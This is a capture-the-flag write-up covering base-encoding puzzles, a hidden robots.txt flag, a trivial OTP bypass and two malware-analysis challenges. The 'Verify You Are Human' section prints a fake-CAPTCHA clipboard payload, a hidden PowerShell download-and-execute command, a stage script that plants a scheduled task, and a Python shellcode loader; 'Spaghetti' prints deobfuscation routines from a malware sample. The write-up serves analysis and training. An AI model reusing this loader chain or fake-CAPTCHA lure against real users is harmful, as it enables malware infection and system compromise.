Completion Certificate

Day 01

Spam Test

Challenge Prompt

Time to do some careful Googling… what’s the MD5 hash of the Generic Test for Unsolicited Bulk Email (GTUBE) string?

Submit the hash wrapped within the flag{ prefix and } suffix to match the standard flag format.

Solution

A Google search for Generic Test for Unsolicited Bulk Email returns the GTUBE Wikipedia page, which contains a table of hash values of the GTUBE string.

XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X

The MD5 hash is 6a684e1cdca03e6a436d182dd4069183.

flag{6a684e1cdca03e6a436d182dd4069183}

Cover All Your Bases

Challenge Prompt (Base 2)

Can you make sense of all the different data below? Each one has a different representation!

Uncover the appropriate plaintext and submit the flags below! Do you know what all these ones and zeros mean?

01000111 01110010 01100101 01100001 01110100 00100000 01110111 01101111 01110010 01101011 00100001 
00100000 01010100 01101000 01100001 01110100 00100000 01110111 01100001 01110011 00100000 01000010 
01100001 01110011 01100101 00100000 00110010 00101100 00100000 01100010 01100101 01110100 01110100 
01100101 01110010 00100000 01101011 01101110 01101111 01110111 01101110 00100000 01100001 01110011 
00100000 01100010 01101001 01101110 01100001 01110010 01111001 00101110 00100000 01001001 01110100 
00100000 01101111 01101110 01101100 01111001 00100000 01110101 01110011 01100101 01110011 00100000 
01110100 01110111 01101111 00100000 01110011 01111001 01101101 01100010 01101111 01101100 01110011 
00111010 00100000 00110000 00100000 01100001 01101110 01100100 00100000 00110001 00101100 00100000 
01110111 01101000 01101001 01100011 01101000 00100000 01101101 01100001 01101011 01100101 01110011 
00100000 01101001 01110100 00100000 01100101 01100001 01110011 01111001 00100000 01110100 01101111 
00100000 01110011 01110000 01101111 01110100 00101110 00100000 01000001 01101110 01111001 01110111 
01100001 01111001 00101100 00100000 01101000 01100101 01110010 01100101 00100111 01110011 00100000 
01111001 01101111 01110101 01110010 00100000 01100110 01101100 01100001 01100111 00111010 00100000 
01100110 01101100 01100001 01100111 01111011 00110110 00110111 00111000 01100001 01100011 00110100 
00110101 00110100 00111000 00110111 01100011 00111001 00111000 00110110 00110010 01100001 00110110 
01100011 00110010 01100011 00110000 00110000 01100001 00110001 01100001 01100110 01100110 01100101 
01100100 00111001 01100100 01100011 01111101

Solution (Base 2)

Given the title of the challenge, and the format of the data, this appears to be binary encoded, or base 2. Decoding the data returns the following message, which includes the flag.

Great work! That was Base 2, better known as binary. It only uses two symbols: 0 and 1, which makes it easy to spot. Anyway, here's your flag: flag{678ac45487c9862a6c2c00a1affed9dc}

flag{678ac45487c9862a6c2c00a1affed9dc}

Challenge Prompt (Base 8)

Hmmm, a group of triplets, it looks like. Can you find out what they are trying to say?

116 151 143 145 154 171 040 144 157 156 145 041 040 124 150 141 164 040 167 141 163 040 102 141 163 
145 040 070 054 040 157 162 040 157 143 164 141 154 056 040 111 164 040 165 163 145 163 040 144 151 
147 151 164 163 040 060 055 067 054 040 141 156 144 040 157 146 164 145 156 040 163 150 157 167 163 
040 165 160 040 151 156 040 146 151 154 145 040 160 145 162 155 151 163 163 151 157 156 163 040 157 
156 040 114 151 156 165 170 056 040 123 160 157 164 040 151 164 040 167 150 145 156 040 156 165 155 
142 145 162 163 040 150 141 166 145 040 154 145 141 144 151 156 147 040 060 163 056 040 110 145 162 
145 047 163 040 171 157 165 162 040 146 154 141 147 072 040 146 154 141 147 173 146 145 065 070 060 
145 060 065 145 065 062 067 146 062 060 064 062 061 062 071 060 066 060 065 070 060 071 143 141 145 
143 071 175

Solution (Base 8)

This data appears to be octal encoded, or base 8. Decoding the data returns the following message, which includes the flag.

Nicely done! That was Base 8, or octal. It uses digits 0-7, and often shows up in file permissions on Linux. Spot it when numbers have leading 0s. Here's your flag: flag{fe580e05e527f20421290605809caec9}

flag{fe580e05e527f20421290605809caec9}

Challenge Prompt (Base 10)

These numbers look familiar… but how could they be represented as text?

089 111 117 032 099 114 097 099 107 101 100 032 105 116 033 032 084 104 097 116 032 119 097 115 032 
066 097 115 101 032 049 048 044 032 111 117 114 032 101 118 101 114 121 100 097 121 032 100 101 099 
105 109 097 108 032 115 121 115 116 101 109 046 032 073 116 032 114 117 110 115 032 102 114 111 109 
032 048 045 057 032 097 110 100 032 108 111 111 107 115 032 108 105 107 101 032 110 111 114 109 097 
108 032 110 117 109 098 101 114 115 046 032 069 097 115 121 032 116 111 032 105 100 101 110 116 105 
102 121 033 032 089 111 117 114 032 102 108 097 103 058 032 102 108 097 103 123 055 100 049 101 098 
050 101 048 055 055 054 099 100 055 099 053 099 055 056 100 102 048 049 048 049 048 102 051 048 101 
053 048 125

Solution (Base 10)

This data appears to be decimal encoded, or base 10. Decoding the data returns the following message, which includes the flag.

You cracked it! That was Base 10, our everyday decimal system. It runs from 0-9 and looks like normal numbers. Easy to identify! Your flag: flag{7d1eb2e0776cd7c5c78df01010f30e50}

flag{7d1eb2e0776cd7c5c78df01010f30e50}

Challenge Prompt (Base 16)

These look like pairs! But these have weird letters in them?

41 77 65 73 6f 6d 65 20 6a 6f 62 21 20 54 68 61 74 20 77 61 73 20 42 61 73 65 20 31 36 2c 20 6f 72 
20 68 65 78 61 64 65 63 69 6d 61 6c 2e 20 49 74 20 75 73 65 73 20 30 2d 39 20 61 6e 64 20 41 2d 46 
2c 20 6f 66 74 65 6e 20 77 69 74 68 20 70 72 65 66 69 78 65 73 20 6c 69 6b 65 20 30 78 2e 20 43 6f 
6d 6d 6f 6e 20 69 6e 20 6d 65 6d 6f 72 79 20 64 75 6d 70 73 20 61 6e 64 20 63 6f 6c 6f 72 20 63 6f 
64 65 73 2e 20 48 65 72 65 20 69 73 20 79 6f 75 72 20 66 6c 61 67 3a 20 66 6c 61 67 7b 64 33 63 62 
32 62 65 33 65 34 65 34 61 38 66 35 31 37 64 39 63 35 63 65 34 33 37 32 62 30 62 37 7d

Solution (Base 16)

This data appears to be hexadecimal encoded, or base 16. Decoding the data returns the following message, which includes the flag.

Awesome job! That was Base 16, or hexadecimal. It uses 0-9 and A-F, often with prefixes like 0x. Common in memory dumps and color codes. Here is your flag: flag{d3cb2be3e4e4a8f517d9c5ce4372b0b7}

flag{d3cb2be3e4e4a8f517d9c5ce4372b0b7}

Challenge Prompt (Base 32)

Uppercase letters and digits in a long stream…. notice anything about the padding?

I5XW6ZBAO5XXE2ZBEBKGQYLUEB3WC4ZAIJQXGZJAGMZCYIDPMZ2GK3RAOVZWKZBA
NFXCAR3PN5TWYZJAIF2XI2DFNZ2GSY3BORXXEIDLMV4XGLRAJF2CA5LTMVZSAQJN
LIQGC3TEEAZC2NZOEBEWMIDZN52SA43FMUQGY33UOMQG6ZRAOVYHAZLSMNQXGZJA
NRSXI5DFOJZSAYLOMQQGI2LHNF2HGLBAORUGS3TLEBBGC43FGMZC4ICHMV2CA5DI
MF2CAZTMMFTSCIDGNRQWO6ZZMJRDKYTCHBSWCNJQHBRGGZTCMM2TCYTEGVSTCMLF
MZRDEOLDMN6Q====

Solution (Base 32)

Following the same pattern as the previous solutions, this data appears to be encoded using a different base. The lack of lowercase characters and limited range of numbers, in addition to the padding (=) at the end, suggest this may be base 32. Decoding the data returns the following message, which includes the flag.

Good work! That was Base 32, often used in Google Authenticator keys. It uses A-Z and 2-7. If you see lots of uppercase letters and digits, think Base32. Get that flag! flag{9bb5bb8ea508bcfbc51bd5e11efb29cc}

flag{9bb5bb8ea508bcfbc51bd5e11efb29cc}

Challenge Prompt (Base 45)

A mixed alphabet with symbols. What is this one supposed to be?

K19X CSUEWQE24EBWE3/DK848UAIECV44HECN34HECDZC0R61Q57%E  CH44M-DSCAB44V3E6$CE4404
EQ34CYA8T8D3D3WE5UD-M8*+APR8IN85LEREDOEDIEC6$CI$5*C9T44LQE.OEOCCJ$DH8FX3EK447$C7
WE4LE1Q5AVCD3DLWE1Q5CECRTC-QEC$D*3EBPEU34SUE*VD%3E.OEKFE*EDIQDA448%EC44Z CV3E6$C
B44TVDCEC4WDI$5Y69O/E944E44PVDV1DE44PVDV3DVICYJCI-C4:6846:/6A46YICJOCGM64ECYJCKA
7YJC2R6J-CZ2

Solution (Base 45)

Again, following the same pattern, the additional characters suggest this is base encoded with a higher radix. Base 45 is another common encoding. Decoding the data returns the following message, which includes the flag.

Great spotting! That was Base 45, used in QR codes for EU Digital COVID Certificates. It uses a mix of letters, digits, and symbols. It looks quirky but decodes cleanly. Have a flag! flag{b5bef376027104b8c73dafbe95be47f4}

flag{b5bef376027104b8c73dafbe95be47f4}

Challenge Prompt (Base 64)

Compact and common on the wire… does the ending give you a clue?

V2VsbCBkb25lISBUaGF0IHdhcyBCYXNlIDY0LCBzdXBlciBjb21tb24gZm9yIGVuY29kaW5nIGRh
dGEgaW4gZW1haWwgYW5kIHdlYiB0cmFmZmljLiBMb29rIGZvciBBLVosIGEteiwgMC05LCBwbHVz
ICsgYW5kIC8sIGFuZCBzb21ldGltZXMgdGhlIHBhZGRpbmcgPSBzaWducyBhdCB0aGUgZW5kLiBG
bGFnOiBmbGFne2NkMDE2NGZmNjQ3MjZmMjk3MmIyZDhmMmFjMDExOWRifQ==

Solution (Base 64)

Given the prompt for this challenge, this data is most likely base 64 encoded. Decoding the data returns the following message, which includes the flag.

Well done! That was Base 64, super common for encoding data in email and web traffic. Look for A-Z, a-z, 0-9, plus + and /, and sometimes the padding = signs at the end. Flag: flag{cd0164ff64726f2972b2d8f2ac0119db}

flag{cd0164ff64726f2972b2d8f2ac0119db}

Challenge Prompt (Base 85)

This variant often shows special markers. See anything bracketing the data?

<~:2+3L+EqaECEXg"BOQ!*G@>P86=FqH+?250+EqL5@qZupDf'',+DG^9A8,XfATD@"F<Ga8EbSs"FE9
&W<+ohc6"FnCAM6>j@qfX:2'@'NEbSs"F<G^IF^]*&Gp%0M@<-I2+EqOABHTEd+CT.u+D#G$F!,[@FD)
eG4t[sWBOr;a7RJ:Q3ANE6G%#E*@;^00F`V,8+CQC%Ec5AsATAo%CiF&r@V'X(.!]`R+DkP4+EM+*+Cf
(nEa`I"ATDi7Ch[Zr+FYja?n<FI/0JkO+FP[k+A$/fH#IhG+Co%nDe*F"+Cf>,E,8rsDK?q/@W-C2+DG
_:@;KXg+EMgF@W-((/0K"XBlmiu+EV:.+@9LXAN2OiG%#E*@;^0>+@^0UB0%/ICggt'@5K\q@:_,Q2D[
<IA2uM-1h/C&AN)S+@P_LS2.U<.I/~>

Solution (Base 85)

The additional characters in this data suggest this may be base 85. Decoding the data returns the following message, which includes the flag.

Nice work! That was Base 85, which comes in different variants. The Adobe/Ascii85 variant usually starts with <~ and ends with ~>. The RFC 1924 variant uses a broader alphabet (you may see characters like ~, `, {, or }). If your decoder complains about invalid symbols, switch the Base85 variant. Flag: flag{a414ae096381d9594c58e785b3c95dfb}

flag{a414ae096381d9594c58e785b3c95dfb}

Challenge Prompt (Base 92)

This noisy alphabet is picky about whitespace… formatting might matter!

@D_<sB5GVmj-;A[GD:PIptd9#KgRoG![3\gx4mcIUAiYA8M=E_=UOU5S$HqE$p<KHnvkV66}Q?tqB]P)
Dy\4O\cT$^qE;BG\LX&pVXaZ$Tq0,'1:I3jzOY4Rs}8iY(1.GjE2RDb#yuj-*n10I1S\d:W-#pm0',!e
D:H4sK'c@^jAiC%1K}1^V65i/Upa*U(mEU'(Va'b/nt_*vgYH.^_V_Td5AgNoIWlD9jvOZ3oKhm/WwX+
-GHriuce$TlHB+#)E]kGisTc:ehwoA<RF;gx-ld->om0iC&$I3SXV_'bF.gOk[#-H,1kv93JUpCu&I-r
4c^^pu+!?9iXkKdk6,1cPeWN.@E?CO

Solution (Base 92)

The additional characters and note about whitespace suggest this may be base 92. Attempting to decode the data using CyberChef initially fails with an error message about \n being an invalid base 92 character. After updating the recipe to remove these characters and decode the data, the resulting decoded message includes the flag.

Very nice! That was Base 92. Many decoders do not ignore whitespace, so you may need to remove line breaks before decoding. Tip: Base92 uses a wide printable set but excludes spaces and newlines; strip them before decoding. Here is another flag: flag{0c97042d855d7b353dc87c91ea902129}

flag{0c97042d855d7b353dc87c91ea902129}

Challenge Prompt (Base 65536)

The data below looks super weird! Don’t panic if your editor can’t render every symbol. Can you tell what it is?

𖡅驣ꍬ𐙥啴𒁪噢褠陨啴陷啳陂驳欠樵欳唬鵷顩啨陣啮陭啰𒁴𐘠陥ꍲ啹𔑥𓁥啹𐙕顩饯啥鵣𓁡顡驴捲縠啦𒁹啵驳啥鹷饬ꔠ𖡩𓅥𒀠啦饯啤ꍧ𒅹𓅨
阠饮𓄠ꕹ𒁢𓅬唬𒁹啵𓁡啥𓁰靯靡𖥬ꌠ𒁯鹫鱮阠啴鵴𓅩售驈驲鸠啳𒁹𓁵鬠𐙩ꍡ鬠陬潧鬠陬𠅧樴昷椷餵饣餴欱浦此敦污饦魡昷朵頸ᕽ

Solution (Base 65536)

This challenge required some extra searching around for the solution, but continuing with the theme of the previous challenges, the data is encoding using a more obscure base 65536 encoding. Decoding the data using an online decoder returns the following message, which includes the flag.

Excellent job! That was Base 65536, which can map to nearly every Unicode character. If you see wild mixes of odd glyphs and symbols, you are probably looking at this. Here is your final flag: flag{4571745dcd4d16f8d6f0a7fdaf71528c}

flag{4571745dcd4d16f8d6f0a7fdaf71528c}

Just a Little Bit

Challenge Prompt

If just a little bit were to go missing… would it really even matter?

11001101101100110000111001111111011011001011000110110011011001111000110110001011011001110011100001
11001011100010110010011001100110010110010111001010110011011000111001010110011011100001110010110101
1100100011010101110010110110011011011001000111001011001111001101111101

Solution

Typically, binary encoded data uses 8 bits to represent each byte. Attempting to decode the data as binary with a standard byte length of 8 bits results in garbled output.

ͳl±³g‹g8râə–\¬ØåfáË\\¶m‘Ë<ß

The prompt for this challenge, however, suggests a bit or several bits are missing from the binary encoded data. Attempting to decode the data using CyberChef, this time using a byte length of 7 bits, reveals the flag.

flag{2c33c169aebdf2ee31e3895d5966d93f}

QRception

Challenge Prompt

Wow, that’s a big QR code! I wonder what it says!

Solution

Using CyberChef to parse the QR code above, and setting the output encoding to UTF-8 to ensure the characters are rendered properly results in the following QR code.

█████████████████████████████████████
█████████████████████████████████████
████ ▄▄▄▄▄ █ ██▀▀▀▀▄█▀█▀ █ ▄▄▄▄▄ ████
████ █   █ █  ▀█ ▀▀ ▄▄█▄▄█ █   █ ████
████ █▄▄▄█ █▀  █▄▀█▄▀██▀██ █▄▄▄█ ████
████▄▄▄▄▄▄▄█▄█ ▀▄█ ▀ ▀▄█ █▄▄▄▄▄▄▄████
████▄▄▀▀ ▄▄█▀█▄█▄▄  ▄▄▀▄▄▀▀▄▀▄ ▄ ████
████▀ ▀▄██▄   ▄█▀▄█▄▄▀▄▀▀▄▄▀█ ▄█ ████
████ ▄▀▀  ▄▄█▀▀▄▀▄ ▀▄▄▄▄▄▀▀▄▀▀██▀████
████▀ ▀▀▄▄▄▀▄▄█ ▄ ▄ ▀ █▀█ ▀▄▄ ▄▀ ████
████ █▄▀▀▄▄▄█▄██▄ ▀ ▄▄▄▄▄▄▀▀▀▄▀▄ ████
██████  ██▄▀▄▀ █▀█▀▄▀▀ █ ▀▄█▄▄█▀▄████
████▄▄▄██▄▄▄▀▄ ▄▀▄▄▀▀▄▀▄ ▄▄▄ ▀▀▄▀████
████ ▄▄▄▄▄ █▀█  ▄ ▄ ▀▀▀▄ █▄█ ▄██▄████
████ █   █ █▄███▄ ▀▀▀▄▀  ▄▄ ▄█▀▄▀████
████ █▄▄▄█ █▀▀ █▀█▀ █ ▄▀ ▀█ ███  ████
████▄▄▄▄▄▄▄█▄██▄█▄▄██▄█▄▄██████▄█████
█████████████████████████████████████
█████████████████████████████████████

Taking a screenshot of this QR code and parsing it using CyberChef, reveals the flag.

flag{e1487f138f885bfef64f07cdeac96908}

RFC 9309

Challenge Prompt

Sorry. You know every CTF has to have it. 🤷

🖥️ RFC 9309 - 10.1.149.237

Solution

RFC 9309 defines the “Robot Exclusion Protocol” which websites implement by publishing a file named robots.txt that contains specific rules for crawlers. This RFC defines the specific syntax for these rules.

Fetching the file from the server at http://10.1.149.237/robots.txt, at first glance appears to be a normal robots.txt file containing a basic disallow rule.

User-Agent: *
Disallow: /

These rules, however, are followed by a tremendous amount of whitespace. The flag is found hidden about halfway through the file, preceded by a long string of spaces. The flag could be extracted by searching for it in the browser, or using curl and grep.

curl -s "http://10.1.149.237/robots.txt" | grep -oE "flag\{[a-z0-9]{32}\}"

flag{aec1142c199aa5d8ad0f3ae3fa82e13c}

Verify You Are Human

Challenge Prompt

My computer said I needed to update MS Teams, so that is what I have been trying to do…

…but I can’t seem to get past this CAPTCHA!

CAUTION

This is the Malware category. Please be sure to approach this challenge material within an isolated virtual machine.

NOTE

Some components of this challenge may be finicky with the browser-based connection. You can still achieve what you need to, but there may be some more extra steps than if you were to approach this over the VPN.

(i.e., “remove the port” when you need to… you’ll know what I mean 😜)

🖥️ Verify You Are Human - 10.1.178.152

Solution

Navigating to the webpage for the challenge reveals the CAPTCHA page shown below.

Clicking the CAPTCHA displays the following instructions. The clipboard likely contains a command that is intended to be executed.

Viewing the page source reveals a base64 encoded payload which is copied to the clipboard.

unsecuredCopyToClipboard(decodeURIComponent(escape(atob("IkM6XFdJTkRPV1Ncc3lzdGVtMzJcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxQb3dlclNoZWxsLmV4ZSIgLVdpIEhJIC1ub3AgLWMgIiRVa3ZxUkh0SXI9JGVudjpMb2NhbEFwcERhdGErJ1wnKyhHZXQtUmFuZG9tIC1NaW5pbXVtIDU0ODIgLU1heGltdW0gODYyNDUpKycuUFMxJztpcm0gJ2h0dHA6Ly8xMC4xLjE3OC4xNTIvP3RpYz0xJz4gJFVrdnFSSHRJcjtwb3dlcnNoZWxsIC1XaSBISSAtZXAgYnlwYXNzIC1mICRVa3ZxUkh0SXIi"))));

Stage 0

The following is the decoded payload which is copied to the clipboard by the fake CAPTCHA. This command launches a new PowerShell process with a hidden window and no profile. The executed command downloads and executes another PowerShell script, saving it to the current user’s local app data folder with a random file name.

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Wi HI -nop -c "$UkvqRHtIr=$env:LocalAppData+'\'+(Get-Random -Minimum 5482 -Maximum 86245)+'.PS1';irm 'http://10.1.178.152/?tic=1'> $UkvqRHtIr;powershell -Wi HI -ep bypass -f $UkvqRHtIr"

Stage 1

This stage downloads a zip file containing a Python executable and compiled Python script. A scheduled task is created to execute the script in 180 seconds. Additionally, the script is executed immediately.

curl 'http://10.1.178.152/?tic=1' > stage1.ps1

# stage1.ps1

$JGFDGMKNGD = ([char]46)+([char]112)+([char]121)+([char]99);
$HMGDSHGSHSHS = [guid]::NewGuid();
$OIEOPTRJGS = $env:LocalAppData;

# Download next stage; save with pdf extension
irm 'http://10.1.178.152/?tic=2' -OutFile $OIEOPTRJGS\$HMGDSHGSHSHS.pdf;

# Extract zip to local app data
Add-Type -AssemblyName System.IO.Compression.FileSystem;
[System.IO.Compression.ZipFile]::ExtractToDirectory("$OIEOPTRJGS\$HMGDSHGSHSHS.pdf", "$OIEOPTRJGS\$HMGDSHGSHSHS");

$PIEVSDDGs = Join-Path $OIEOPTRJGS $HMGDSHGSHSHS;
$WQRGSGSD = "$HMGDSHGSHSHS";
$RSHSRHSRJSJSGSE = "$PIEVSDDGs\pythonw.exe";
$RYGSDFSGSH = "$PIEVSDDGs\cpython-3134.pyc";
$ENRYERTRYRNTER = New-ScheduledTaskAction -Execute $RSHSRHSRJSJSGSE -Argument "`"$RYGSDFSGSH`"";
$TDRBRTRNREN = (Get-Date).AddSeconds(180);
$YRBNETMREMY = New-ScheduledTaskTrigger -Once -At $TDRBRTRNREN;
$KRYIYRTEMETN = New-ScheduledTaskPrincipal -UserId "$env:USERNAME" -LogonType Interactive -RunLevel Limited;
Register-ScheduledTask -TaskName $WQRGSGSD -Action $ENRYERTRYRNTER -Trigger $YRBNETMREMY -Principal $KRYIYRTEMETN -Force;
Set-Location $PIEVSDDGs;
$WMVCNDYGDHJ = "cpython-3134" + $JGFDGMKNGD;
Rename-Item -Path "cpython-3134" -NewName $WMVCNDYGDHJ;

# Execute cpython-3134.pyc
iex ('rundll32 shell32.dll,ShellExec_RunDLL "' + $PIEVSDDGs + '\pythonw" "' + $PIEVSDDGs + '\'+ $WMVCNDYGDHJ + '"');

Remove-Item $MyInvocation.MyCommand.Path -Force;
Set-Clipboard

Stage 2

The downloaded zip file also contains output.py, which is the source of the compiled Python script, cpython-3134.pyc.

curl 'http://10.1.178.152/?tic=2' > stage2.zip
unzip stage2.zip -d ./stage2

This script decodes and executes another Python script.

# output.py

import base64
#nfenru9en9vnebvnerbneubneubn
exec(base64.b64decode("aW1wb3J0IGN0eXBlcwoKZGVmIHhvcl9kZWNyeXB0KGNpcGhlcnRleHRfYnl0ZXMsIGtleV9ieXRlcyk6CiAgICBkZWNyeXB0ZWRfYnl0ZXMgPSBieXRlYXJyYXkoKQogICAga2V5X2xlbmd0aCA9IGxlbihrZXlfYnl0ZXMpCiAgICBmb3IgaSwgYnl0ZSBpbiBlbnVtZXJhdGUoY2lwaGVydGV4dF9ieXRlcyk6CiAgICAgICAgZGVjcnlwdGVkX2J5dGUgPSBieXRlIF4ga2V5X2J5dGVzW2kgJSBrZXlfbGVuZ3RoXQogICAgICAgIGRlY3J5cHRlZF9ieXRlcy5hcHBlbmQoZGVjcnlwdGVkX2J5dGUpCiAgICByZXR1cm4gYnl0ZXMoZGVjcnlwdGVkX2J5dGVzKQoKc2hlbGxjb2RlID0gYnl0ZWFycmF5KHhvcl9kZWNyeXB0KGJhc2U2NC5iNjRkZWNvZGUoJ3pHZGdUNkdIUjl1WEo2ODJrZGFtMUE1VGJ2SlAvQXA4N1Y2SnhJQ3pDOXlnZlgyU1VvSUwvVzVjRVAveGVrSlRqRytaR2dIZVZDM2NsZ3o5eDVYNW1nV0xHTmtnYStpaXhCeVRCa2thMHhicVlzMVRmT1Z6azJidURDakFlc2Rpc1U4ODdwOVVSa09MMHJEdmU2cWU3Z2p5YWI0SDI1ZFBqTytkVllrTnVHOHdXUT09JyksIGJhc2U2NC5iNjRkZWNvZGUoJ21lNkZ6azBIUjl1WFR6enVGVkxPUk0yVitacU1iQT09JykpKQpwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSksIGN0eXBlcy5jX2ludCgweDMwMDApLCBjdHlwZXMuY19pbnQoMHg0MCkpCmJ1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLCBidWYsIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSkpCmZ1bmN0eXBlID0gY3R5cGVzLkNGVU5DVFlQRShjdHlwZXMuY192b2lkX3ApCmZuID0gZnVuY3R5cGUocHRyKQpmbigp").decode('utf-8'))
#g0emgoemboemoetmboemomeio

The decoded script performs an XOR on another base64 encoded payload. The resulting shellcode is then loaded into memory and executed.

import ctypes

def xor_decrypt(ciphertext_bytes, key_bytes):
    decrypted_bytes = bytearray()
    key_length = len(key_bytes)
    for i, byte in enumerate(ciphertext_bytes):
        decrypted_byte = byte ^ key_bytes[i % key_length]
        decrypted_bytes.append(decrypted_byte)
    return bytes(decrypted_bytes)

shellcode = bytearray(xor_decrypt(base64.b64decode('zGdgT6GHR9uXJ682kdam1A5TbvJP/Ap87V6JxICzC9ygfX2SUoIL/W5cEP/xekJTjG+ZGgHeVC3clgz9x5X5mgWLGNkga+iixByTBkka0xbqYs1TfOVzk2buDCjAesdisU887p9URkOL0rDve6qe7gjyab4H25dPjO+dVYkNuG8wWQ=='), base64.b64decode('me6Fzk0HR9uXTzzuFVLORM2V+ZqMbA==')))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
functype = ctypes.CFUNCTYPE(ctypes.c_void_p)
fn = functype(ptr)
fn()

Shellcode

Using the key identified in the previous stage, the ciphertext can be decoded and decrypted using CyberChef, and the shellcode can be saved as shellcode.bin.

The decrypted shellcode can then be imported into Ghidra and decompiled. The resulting C function appears to perform a series of XOR operations on an array of hexadecimal values.

void FUN_00000000(void)

{
  uint3 uVar1;
  int iVar2;
  uint *puVar3;
  uint *puVar4;
  undefined1 *puVar5;
  uint *puVar6;
  uint local_ac [9];
  uint uStack_88;
  undefined1 local_84 [128];
  
  uStack_88 = 0x8484d893;
  local_ac[8] = 0x97c6c390;
  local_ac[7] = 0x929390c3;
  local_ac[6] = 0xc7c3c490;
  local_ac[5] = 0x939c939c;
  local_ac[4] = 0xc6c69cc0;
  local_ac[3] = 0x939cc697;
  local_ac[2] = 0xc19dc794;
  local_ac[1] = 0x9196c1de;
  puVar4 = local_ac;
  puVar3 = local_ac;
  puVar6 = local_ac;
  local_ac[0] = 0xc2c4c9c3;
  iVar2 = 10;
  do {
    *puVar4 = *puVar4 ^ 0xa5a5a5a5;
    puVar4 = puVar4 + 1;
    iVar2 = iVar2 + -1;
  } while (iVar2 != 0);
  uVar1 = (uint3)uStack_88;
  uStack_88 = (uint)(uVar1 & 0xffff);
  puVar5 = local_84;
  iVar2 = 0x26;
  do {
    *puVar5 = *(undefined1 *)puVar3;
    puVar3 = (uint *)((int)puVar3 + 1);
    puVar5 = puVar5 + 1;
    iVar2 = iVar2 + -1;
  } while (iVar2 != 0);
  *puVar5 = 0;
  iVar2 = 0x40;
  do {
    *(undefined1 *)puVar6 = 1;
    puVar6 = (uint *)((int)puVar6 + 1);
    iVar2 = iVar2 + -1;
  } while (iVar2 != 0);
  return;
}

Using CyberChef again, the same XOR operations can be performed. Finally, converting to little endian reveals the flag.

flag{d341b8d2c96e9cc96965afbf5675fc26}

Day 02

OFA

Challenge Prompt

Two factors? In this economy??!!

🖥️ OFA - 10.1.30.23

Solution

Navigating to the webpage for the challenge reveals a login page.

After entering an arbitrary username and password, such as user:pass, the login page redirects to /otp.

Entering a random 6-digit code returns an error message that the code does not match 103248.

Entering the provided code, 103248, redirects to /success, which reveals the flag.

flag{013cb9b123afec26b572af5087364081}

Spaghetti

Challenge Prompt

You know, I’ve been thinking… at the end of the day, spaghetti is really just strings of pasta!

Anyway, we saw this weird file running on startup. Can you figure out what this is?

I’m sure you’ll get more understanding of the questions below as you explore!

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

IMPORTANT

The ZIP archive password is infected.

NOTE

You may find a public paste URL that is expired. This is an artifact of the original malware sample and is intentional. This URL is not necessary for the challenge.

📄spaghetti.zip - 331 KB

MainFileSettings

Uncover the flag within the “main file.”

NOTE

Once you uncover the intended payload, you shouldn’t need to do any further analysis. Use context clues from the challenge description and you should find the flag.

My Fourth Oasis

Uncover the flag within “my fourth oasis.”

MEMEMAN

Uncover the flag beside “MEMEMAN.”

Solution

The provided file, spaghetti.zip, contains two files AYGIW.tmp and spaghetti. AYGIW.tmp contains a single line of seemingly meaningless, garbled ASCII text, which is likely encrypted or encoded. spaghetti contains a somewhat obfuscated PowerShell script.

The script starts with a large block of randomly named variables, broken up by blocks of comments containing quotes from various people. Although the quotes are not repeated, the same variable declarations are repeated numerous times throughout the script.

MainFileSettings

After cleaning up the script by removing the blocks of quotes and repeated variable declarations, what remains are several short utility functions and ~40 lines of code. The first block following the function declarations reads the contents of AYGIW.tmp and stores it in a variable named MainFileSettings.

$currentDirectory = Get-Location
$fileName = "AYGIW.tmp"
$filePath = Join-Path -Path $currentDirectory -ChildPath $fileName
$MainFileSettings = Get-Content -Path $filePath

Next, the content of AYGIW.tmp is decoded by the HombaAmigo function.

Function HombaAmigo([String] $IN) {
    $RunRBTX1 = $IN.Replace('~', '000').Replace('%', '4')
    $bytes = New-Object -TypeName byte[] -ArgumentList ($RunRBTX1.Length / 1 + 1 + 0)
    for ($i = 0; $i -lt $RunRBTX1.Length; $i += 1 + 1 + 0) {
        $bytes[$i / 2] = [Convert]::ToByte($RunRBTX1.Substring($i, 1 + 1 + 0), 6 + 10 + 0)
    }
    return [byte[]]$bytes
}

[byte[]]$WULC4 = HombaAmigo($MainFileSettings.replace('WT', '00'))

After careful review, these two blocks should be safe to execute, resulting in a byte array stored in the WULC4 variable. This byte array can then be written to a file for further analysis.

$WULC4 | Out-File MainFileSettings

The resulting byte array appears to be decimal encoded. After using CyberChef to decode the data, the resulting output appears to be a Window PE file. With the file saved as MainFileSettings.exe, the file command confirms this.

MainFileSettings.exe: PE32 executable for MS Windows 5.01 (GUI), Intel i386, 7 sections

Using strings and grep, the first flag is found.

strings temp/MainFileSettings.exe | grep -i flag

flag{39544d3b5374ebf7d39b8c260fc4afd8}

My Fourth Oasis

Returning to the spaghetti PowerShell script, the next thing that stands out is the MyOasis4 variable, which seems to be hinted at by the challenge prompt for the second flag. The assignment of this variable appears to convert a long string of characters into binary encoding, then uses the FonatozQZ function to decode.

Function FonatozQZ($monoTXtak) {
    $byTZlist = [System.Collections.Generic.List[Byte]]::new()
    for ($i = 0; $i -lt $monoTXtak.Length; $i += 8) {
        $byTZlist.Add([Convert]::ToByte([String] $monoTXtak.Substring($i, 8), 2))
    }
    return [System.Text.Encoding]::ASCII.GetString($byTZlist.ToArray())
}

